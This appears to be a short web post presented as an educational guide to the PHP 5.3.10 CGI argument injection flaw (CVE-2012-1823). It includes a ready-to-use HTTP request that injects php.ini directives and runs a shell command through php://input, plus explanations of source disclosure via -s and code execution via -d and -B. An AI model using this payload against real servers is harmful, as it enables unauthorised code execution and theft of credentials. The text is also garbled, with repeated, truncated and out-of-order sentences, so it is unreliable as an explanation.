Php 5.3.10 Exploit Guide

This post is written from a security researcher / educational perspective. It explains the "CGI Argument Injection" vulnerability (CVE-2012-1823), which is the most critical exploit associated with this specific version. Title: Revisiting the Ghost of PHP 5.3.10: The CGI Argument Injection Exploit (CVE-2012-1823)

POST /?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1 Host: vulnerable.com Content-Type: application/x-www-form-urlencoded Content-Length: 25 <?php system('id'); ?>

/usr/bin/php-cgi /path/to/index.php The bug occurred in how PHP parsed the query string. If an attacker sent a request without a script name (e.g., http://target.com/?-s ), the PHP engine would misinterpret the query string . php 5.3.10 exploit

The attacker sees the raw PHP source code of the application, including database passwords and API keys. The Grand Prize: Arbitrary Code Execution ( -d and -B ) Seeing source code is bad, but executing code is worse. The -d flag allows you to set php.ini directives on the fly. Combined with -B (Run code before processing input), we get RCE.

However, the RCE payload is specific. Spaces are not allowed in URLs naturally, so they must be replaced with + or %20 . This post is written from a security researcher

Disclaimer: This post is for educational purposes and authorized security testing only. Exploiting systems you do not own is illegal.

When PHP is run in CGI mode (using php-cgi ), the web server passes request data to the PHP binary via command-line arguments. Normally, a request to index.php translates to: If an attacker sent a request without a script name (e

Released in early 2012, PHP 5.3.10 was intended to be a security fix for a previous bug. Ironically, it shipped with a massive, easily exploitable vulnerability that allowed attackers to execute arbitrary code on millions of servers.